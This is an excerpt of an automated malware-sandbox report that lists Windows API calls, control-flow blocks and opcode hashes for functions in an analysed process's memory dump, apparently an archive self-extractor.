                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                              • String ID: %s%s%u
                                                              • API String ID: 689974011-1360425832
                                                              • Opcode ID: 33263517fb3b739883f57be8f76d76a0a7666035e47494d5f170e8bd2fb7f866
                                                              • Instruction ID: 9fe2d5c458dc902ba441550133ce6bfd0b7233d54e3dcabe222c09c409ff2145
                                                              • Opcode Fuzzy Hash: 33263517fb3b739883f57be8f76d76a0a7666035e47494d5f170e8bd2fb7f866
                                                              • Instruction Fuzzy Hash: FE416D71900259AEDF25ABA1CC85EEA77ECEB04704F4090A6FA0DB7151EF708A49CF61

                                                              Control-flow Graph

                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E9A093,00E9A093,?,?,?,00E9F535,00000001,00000001,6AE85006), ref: 00E9F33E
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E9F535,00000001,00000001,6AE85006,?,?,?), ref: 00E9F3C4
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,6AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E9F4BE
                                                              • __freea.LIBCMT ref: 00E9F4CB
                                                                • Part of subcall function 00E9DA90: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E98B1E,?,0000015D,?,?,?,?,00E99FFA,000000FF,00000000,?,?), ref: 00E9DAC2
                                                              • __freea.LIBCMT ref: 00E9F4D4
                                                              • __freea.LIBCMT ref: 00E9F4F9
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 91fa05e150d9c307a439854c656c2672c2c32d377ded871299a09b117920b84d
                                                              • Instruction ID: e0cd49a6d4aa761e9e4e31942e24e69db59b18557f70218ee1063fd8dd87b010
                                                              • Opcode Fuzzy Hash: 91fa05e150d9c307a439854c656c2672c2c32d377ded871299a09b117920b84d
                                                              • Instruction Fuzzy Hash: 5951B072610216AFEF259E64CC81EBB77A9EB84754F155639FD18F6180EB34EC40C7A0

                                                              Control-flow Graph

                                                              APIs
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E87240
                                                                • Part of subcall function 00E82C72: GetVersionExW.KERNEL32(?), ref: 00E82C97
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E87264
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E8727E
                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00E87291
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E872A1
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E872B1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: f032cacbf7d4c9ee716864ceb9f9d77a1a9a72df38bb8c58347f396873fc831c
                                                              • Instruction ID: 1070dc25c0b6d38feb89add4a541c8c9e6ca8d91570b7bd82e110b57fccc39c2
                                                              • Opcode Fuzzy Hash: f032cacbf7d4c9ee716864ceb9f9d77a1a9a72df38bb8c58347f396873fc831c
                                                              • Instruction Fuzzy Hash: 1B31F676108345AFC700DFA9C98499BB7E8FF88754F045A1EF999D3210E730E549CBA6

                                                              Control-flow Graph

                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E92C5F
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E92C79
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E92C8A
                                                              • TranslateMessage.USER32(?), ref: 00E92C94
                                                              • DispatchMessageW.USER32(?), ref: 00E92C9E
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E92CA9
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 2148572870-0
                                                              • Opcode ID: dd5965cca7aa5e0baf2e55c5c892e1494b6993194637946d589f11903ebabe1a
                                                              • Instruction ID: d185a83d082ac0aacd85cfff5a58e416a4fb43b74f4e43c8d854a21273c922a2
                                                              • Opcode Fuzzy Hash: dd5965cca7aa5e0baf2e55c5c892e1494b6993194637946d589f11903ebabe1a
                                                              • Instruction Fuzzy Hash: 8DF03C72A01119BBCF206BA2DC8CDDFBFBCEF46355B104011FA06E6051D678D509C7A0

                                                              Control-flow Graph

                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,?,?,00000000,00000000,00E8A066,?,?,?,?,?,00E8A820,00EBD56C,?,00E8B1B3,00010000), ref: 00E8243E
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00E82485
                                                              • WriteFile.KERNEL32(00000008,?,00E8B1B3,00010000,00000000,02FCED32,?,?,?,00000000,00000000,00E8A066,?,?,?,?), ref: 00E824B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite$Handle
                                                              • String ID: D+$D+
                                                              • API String ID: 4209713984-589233338
                                                              • Opcode ID: fe752818cbf5c7df9ea9dd4166573da14f536955fc44763952789d1cfec7ca45
                                                              • Instruction ID: d1b25bcc5195d9cbb55d25addb266c567e654e1d08ea05247ccfc7bdd87754af
                                                              • Opcode Fuzzy Hash: fe752818cbf5c7df9ea9dd4166573da14f536955fc44763952789d1cfec7ca45
                                                              • Instruction Fuzzy Hash: 943125715043159FDB14EF20D918BAA77A6FB85718F00551DFA9D772A0CB70AC48CBB2

                                                              Control-flow Graph

                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00E985BA,?,?,00EE86C8,00000000,?,00E986E5,00000004,InitializeCriticalSectionEx,00EAB054,InitializeCriticalSectionEx,00000000), ref: 00E98588
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: e9d890422229fb6a402450f65ca64b5b0ad2c42b0bbe22a95032db99923ca5fc
                                                              • Instruction ID: f8a8461a4128585fe0c1deb7138308fd89d9f94ab64afd8293d011fabe451e80
                                                              • Opcode Fuzzy Hash: e9d890422229fb6a402450f65ca64b5b0ad2c42b0bbe22a95032db99923ca5fc
                                                              • Instruction Fuzzy Hash: 0611E771E416259FDF228B689E40B9933A4BF17764F161120F845F72E0DF70ED0886D1

                                                              Control-flow Graph (basic blocks by IDA node id: address range, API call in block -> successor blocks)

                                                              • 1852: e8fdcb-e8fdea, GetClassNameW -> 1853, 1854
                                                              • 1853: e8fdec-e8fe01, call e87d24 -> 1859, 1860
                                                              • 1854: e8fe12-e8fe14 -> 1856, 1857
                                                              • 1856: e8fe1f-e8fe21
                                                              • 1857: e8fe16-e8fe18 -> 1856
                                                              • 1859: e8fe11 -> 1854
                                                              • 1860: e8fe03-e8fe0f, FindWindowExW -> 1859
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00E8FDE2
                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00E8FE19
                                                                • Part of subcall function 00E87D24: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00E82FEC,?,?,?,00E82F99,?,-00000002,?,00000000,?), ref: 00E87D3A
                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00E8FE09
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                              • String ID: @Ut$EDIT
                                                              • API String ID: 4243998846-2065656831
                                                              • Opcode ID: 8e0edc8fcd91e0f19f10833bf1ec6bccff2724ede9ea9fba7313fb2f1f25ff40
                                                              • Instruction ID: 4aae8f4df094ad247db15900da324c66b2813da524af61c565c6db97ea31fb00
                                                              • Opcode Fuzzy Hash: 8e0edc8fcd91e0f19f10833bf1ec6bccff2724ede9ea9fba7313fb2f1f25ff40
                                                              • Instruction Fuzzy Hash: 40F0E2326002286ADB206622AC49FDF72AC9F86B10F440064BA08BA183D364E94286B6

                                                              APIs
                                                                • Part of subcall function 00E86B47: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E86B62
                                                                • Part of subcall function 00E86B47: LoadLibraryW.KERNEL32(?,?,00E8583E,Crypt32.dll,00000000,00E858C2,?,?,00E858A4,?,?,?,?), ref: 00E86B84
                                                              • OleInitialize.OLE32(00000000), ref: 00E8FE4F
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E8FE86
                                                              • SHGetMalloc.SHELL32(00ECEA00), ref: 00E8FE90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                              • String ID: riched20.dll$3Qo
                                                              • API String ID: 3498096277-4232643773
                                                              • Opcode ID: 54f8f10410f27ef4d6a7a533c966e55db7b5a7bfb87ad21c0be0d26919c23970
                                                              • Instruction ID: 0f76d4433dd395b2f1ec341067186bc717a47f864d8f31a28222c167a2ded03b
                                                              • Opcode Fuzzy Hash: 54f8f10410f27ef4d6a7a533c966e55db7b5a7bfb87ad21c0be0d26919c23970
                                                              • Instruction Fuzzy Hash: 4BF0FFB1900249AFCB10AF96D8899EFFBFCEF84705F40405AE855F2251D7B456498BA1
                                                              APIs
                                                                • Part of subcall function 00E86B47: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E86B62
                                                                • Part of subcall function 00E86B47: LoadLibraryW.KERNEL32(?,?,00E8583E,Crypt32.dll,00000000,00E858C2,?,?,00E858A4,?,?,?,?), ref: 00E86B84
                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E8584A
                                                              • GetProcAddress.KERNEL32(00EBCFE8,CryptUnprotectMemory), ref: 00E8585A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                              • API String ID: 2141747552-1753850145
                                                              • Opcode ID: 218c6dde4eee8b350af690151fbe262aa130e0e3f07f21c740b3590ef306a2ad
                                                              • Instruction ID: 773f8199e0354358ca64022913bd2b8a8ee0ad5f6feeb6d83889094ba762d810
                                                              • Opcode Fuzzy Hash: 218c6dde4eee8b350af690151fbe262aa130e0e3f07f21c740b3590ef306a2ad
                                                              • Instruction Fuzzy Hash: D9E0DF70800F019ED7202B35BA48B027AD06F1A704F14982FF1C9F7240DEB0E0448B00
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000), ref: 00E81E9F
                                                              • GetLastError.KERNEL32 ref: 00E81EAC
                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800), ref: 00E81EE2
                                                              • GetLastError.KERNEL32 ref: 00E81EEA
                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000), ref: 00E81F39
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: fea55c413cd24777aedb207589b964b17e15ad33af9631a975196e9dd2423cd1
                                                              • Instruction ID: 4bc559b85b0638e34d43abb61e5c93fb9757eb1cfaa4686bdf8aa7941002ba7c
                                                              • Opcode Fuzzy Hash: fea55c413cd24777aedb207589b964b17e15ad33af9631a975196e9dd2423cd1
                                                              • Instruction Fuzzy Hash: 78314730A447416FE730AF20CC45BD6BBACBF05324F101759F9ADA21D0C7B0A88ACB95
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E905B9
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E905CA
                                                              • IsDialogMessageW.USER32(00020482,?), ref: 00E905DE
                                                              • TranslateMessage.USER32(?), ref: 00E905EC
                                                              • DispatchMessageW.USER32(?), ref: 00E905F6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 1266772231-0
                                                              • Opcode ID: 0bfbd303308703ea5957c5db5940de29c2cd31fcf69a6ae625bbdd13e3a71172
                                                              • Instruction ID: 4fb7ae4b6b4e9e8592bf4339bc735c6922fc915a59c1c683534d50703cb187c2
                                                              • Opcode Fuzzy Hash: 0bfbd303308703ea5957c5db5940de29c2cd31fcf69a6ae625bbdd13e3a71172
                                                              • Instruction Fuzzy Hash: 0CF0D0B190112DAF8F20ABA2EC8CEDB7FBCEF452547804415B515F2111E768D509CBB0
                                                              APIs
                                                                • Part of subcall function 00E8582B: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E8584A
                                                                • Part of subcall function 00E8582B: GetProcAddress.KERNEL32(00EBCFE8,CryptUnprotectMemory), ref: 00E8585A
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00E858A4), ref: 00E85938
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$CurrentProcess
                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed$D+
                                                              • API String ID: 2190909847-4049555249
                                                              • Opcode ID: 8626e23dcabca0ce273ae5213ab0705f93363d1e8dce1b799e25c3da5d5c4260
                                                              • Instruction ID: 1500956edbfc24e263ab59d5b0e71cf110478d85706998b97440ef5c251b106c
                                                              • Opcode Fuzzy Hash: 8626e23dcabca0ce273ae5213ab0705f93363d1e8dce1b799e25c3da5d5c4260
                                                              • Instruction Fuzzy Hash: 0C113632A01A21EFDB057F21AC4197E3BA9EF89734B106056FC5D7B251DE34AD068B94
                                                              APIs
                                                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 00E823C7
                                                              • GetLastError.KERNEL32 ref: 00E823D4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID: D+$D+
                                                              • API String ID: 2976181284-589233338
                                                              • Opcode ID: af78dbb2ef0d6e774bb89b4c2d2c76bd1bc50215638efa493e705315bc612fda
                                                              • Instruction ID: e94ac75a419eb6add2940900e1b238f42767e15d00f2c92bfdb59b212fa0827d
                                                              • Opcode Fuzzy Hash: af78dbb2ef0d6e774bb89b4c2d2c76bd1bc50215638efa493e705315bc612fda
                                                              • Instruction Fuzzy Hash: 2711C631600602AFD724A624CC85BA6B3E8EB45374F50562DE25EF25D0D7B4ED4A8760
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strncpy$Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 2527496121-0
                                                              • Opcode ID: 054195ddb092ea550138ab2f295da9af057e8697d9e74bf526dbc98edc3b7983
                                                              • Instruction ID: eda3524891f79a2564beaece872b7b67e86bf5e474484c1642bb471dbcf7aa33
                                                              • Opcode Fuzzy Hash: 054195ddb092ea550138ab2f295da9af057e8697d9e74bf526dbc98edc3b7983
                                                              • Instruction Fuzzy Hash: 97B170B1508300DFC714EF6AEC91E2677E5FB88718F24553EE44DB3261E732A80A9B91
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00E81CE5
                                                              • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00E81CFD
                                                              • GetLastError.KERNEL32 ref: 00E81D2F
                                                              • GetLastError.KERNEL32 ref: 00E81D4E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              • Opcode ID: cd5470191b76ece5351cb57922d771aa330f7f96c3c4353b9fcd8b1a9b65410e
                                                              • Instruction ID: 1147349e7f4fe3725aa3fe95d75728fadf42758c8ba7dc641683bab533a8f2c7
                                                              • Opcode Fuzzy Hash: cd5470191b76ece5351cb57922d771aa330f7f96c3c4353b9fcd8b1a9b65410e
                                                              • Instruction Fuzzy Hash: B511A034900604EFDF307B61C804BAA77BDFB05366F1056A6E42EA51D0D7709D4A9B91
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00E98987,00000000,00000000,?,00E9F65B,00E98987,00000000,00000000,00000000,?,00E9F858,00000006,FlsSetValue), ref: 00E9F6E6
                                                              • GetLastError.KERNEL32(?,00E9F65B,00E98987,00000000,00000000,00000000,?,00E9F858,00000006,FlsSetValue,00EAC630,FlsSetValue,00000000,00000364,?,00E9E1D7), ref: 00E9F6F2
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E9F65B,00E98987,00000000,00000000,00000000,?,00E9F858,00000006,FlsSetValue,00EAC630,FlsSetValue,00000000), ref: 00E9F700
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
